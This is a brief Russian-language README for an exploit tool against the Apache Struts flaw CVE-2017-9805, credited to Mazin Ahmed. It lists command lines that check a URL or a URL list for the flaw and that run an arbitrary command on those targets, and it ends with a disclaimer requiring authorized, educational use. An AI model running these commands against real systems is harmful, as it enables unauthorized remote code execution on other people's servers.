
Эксплойт для Apache Struts CVE-2017-9805
python apache-struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
python apache-struts-pwn.py --list 'urls.txt'
python apache-struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/apache-struts-pwn'
python apache-struts-pwn.py --exploit --list 'urls.txt' -c 'echo test > /tmp/apache-struts-pwn'
Этот проект создан только для образовательных и этических целей тестирования. Использование struts-pwn для атаки на цели без предварительного взаимного согласия является незаконным. Соблюдение всех применимых местных, государственных и федеральных законов является обязанностью конечного пользователя. Разработчики не несут ответственности и не отвечают за любое неправомерное использование или ущерб, причинённый этой программой.
Проект лицензирован в соответствии с лицензией MIT.
Mazin Ahmed